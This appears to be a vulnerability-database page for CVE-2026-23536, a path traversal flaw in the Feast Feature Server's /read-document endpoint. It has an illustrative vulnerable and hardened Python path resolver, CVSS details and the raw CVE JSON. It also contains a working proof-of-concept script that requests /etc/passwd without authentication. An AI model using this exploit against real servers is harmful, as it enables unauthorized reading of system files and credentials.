Security Vulnerability Report
CVE-2026-23536 CVSS 7.5 HIGH

CVE-2026-23536

Published: 2026-03-20 22:16:27
Last Modified: 2026-03-23 14:32:03

Description

A security issue was discovered in the Feast Feature Server's `/read-document` endpoint that allows an unauthenticated remote attacker to read any file accessible to the server process. By sending a specially crafted HTTP POST request, an attacker can bypass intended access restrictions and retrieve sensitive system files, application configuration, and credentials. The server process's own permissions are the only bound on what can be read; no authentication is required.

Weakness: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, "Path Traversal").
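The following is an added example, not Feast's own code, showing the CWE-22 pattern behind this class of bug next to a hardened resolver. It assumes a document root directory `base_dir` and a client-supplied value `requested` (the value the endpoint would take from its request body); the file layout it builds is a constructed fixture. Authentication on the endpoint is a separate control that this example does not address.

```python
import os
import tempfile
from pathlib import Path


class PathTraversalError(ValueError):
    """Raised when a requested document path would leave the document root."""


def vulnerable_read_document(base_dir: str, requested: str) -> str:
    # The CWE-22 pattern: the client-supplied path is joined to the root without
    # validation. os.path.join discards base_dir entirely when `requested` is
    # absolute, and "../" segments walk out of it.
    return Path(os.path.join(base_dir, requested)).read_text()


def resolve_document_path(base_dir: str, requested: str) -> Path:
    """Map a client-supplied relative name onto a regular file inside base_dir, or raise."""
    root = Path(base_dir).resolve(strict=True)
    # Reject the obvious up front: absolute paths, NUL bytes and empty names.
    if not requested or os.path.isabs(requested) or "\x00" in requested:
        raise PathTraversalError("absolute paths, NUL bytes and empty names are rejected")
    try:
        # resolve() canonicalises ".." and follows symlinks, so the containment
        # check below is made on the real filesystem location, not on the string.
        candidate = (root / requested).resolve(strict=True)
    except (OSError, RuntimeError):
        raise PathTraversalError(f"{requested!r} does not exist") from None
    try:
        candidate.relative_to(root)
    except ValueError:
        raise PathTraversalError(f"{requested!r} escapes the document root") from None
    if not candidate.is_file():
        raise PathTraversalError(f"{requested!r} is not a regular file")
    return candidate


def safe_read_document(base_dir: str, requested: str) -> str:
    return resolve_document_path(base_dir, requested).read_text()


def build_demo_tree() -> tuple:
    """Constructed fixture (hypothetical layout, not from the page):
    <tmp>/docs/a.txt is served, <tmp>/secret.txt is not, and
    <tmp>/docs/link -> <tmp>/secret.txt where the platform allows symlinks."""
    tmp = tempfile.mkdtemp()
    docs = Path(tmp) / "docs"
    docs.mkdir()
    (docs / "a.txt").write_text("public")
    secret = Path(tmp) / "secret.txt"
    secret.write_text("SECRET")
    try:
        (docs / "link").symlink_to(secret)
    except OSError:
        pass  # symlinks unavailable (e.g. unprivileged Windows); that case then reads as missing
    return str(docs), str(secret)


def demo() -> dict:
    """Run both readers over the fixture; returns the content read or 'blocked: <error>' per attempt."""
    docs, secret = build_demo_tree()
    attempts = [
        ("benign", "a.txt"),           # legitimate request
        ("dotdot", "../secret.txt"),   # classic traversal
        ("absolute", secret),          # absolute path replaces the root in os.path.join
        ("symlink", "link"),           # in-root symlink pointing outside the root
    ]
    results = {}
    for name, reader in (("vulnerable", vulnerable_read_document), ("safe", safe_read_document)):
        for label, req in attempts:
            try:
                results[(name, label)] = reader(docs, req)
            except (PathTraversalError, OSError) as exc:
                results[(name, label)] = f"blocked: {type(exc).__name__}"
    return results


if __name__ == "__main__":
    for key, value in sorted(demo().items()):
        print(f"{key[0]:>10} {key[1]:>8}: {value!r}")
```

The containment check is done after `resolve()`, so a symlink inside the root that points outside it is rejected as well as `..` and absolute paths; a purely lexical check on the request string would miss the symlink case.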

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Feast Feature Server (see the official security advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (replace with the actual target)
target_url = "http://localhost:8080/read-document"

# Payload attempting to read /etc/passwd
payload = {"path": "/etc/passwd"}

try:
    # Send the POST request without any authentication
    response = requests.post(target_url, json=payload, timeout=10)

    # A 200 response carrying file content indicates the endpoint is exploitable
    if response.status_code == 200:
        print("[+] Exploit successful! File content:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
except requests.RequestException as e:
    print(f"[!] An error occurred: {e}")

References

https://access.redhat.com/security/cve/CVE-2026-23536
https://bugzilla.redhat.com/show_bug.cgi?id=2429302

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-23536",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T22:16:27.087",
    "lastModified": "2026-03-23T14:32:02.800",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A security issue was discovered in the Feast Feature Server's `/read-document` endpoint that allows an unauthenticated remote attacker to read any file accessible to the server process. By sending a specially crafted HTTP POST request, an attacker can bypass intended access restrictions to potentially retrieve sensitive system files, application configurations, and credentials."
      },
      {
        "lang": "es",
        "value": "Se descubrió una vulnerabilidad de seguridad en el endpoint '/read-document' del Feast Feature Server que permite a un atacante remoto no autenticado leer cualquier archivo accesible para el proceso del servidor. Al enviar una solicitud HTTP POST especialmente diseñada, un atacante puede eludir las restricciones de acceso previstas para recuperar potencialmente archivos de sistema sensibles, configuraciones de aplicaciones y credenciales."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-22"}
        ]
      }
    ],
    "references": [
      {"url": "https://access.redhat.com/security/cve/CVE-2026-23536", "source": "[email protected]"},
      {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429302", "source": "[email protected]"}
    ]
  }
}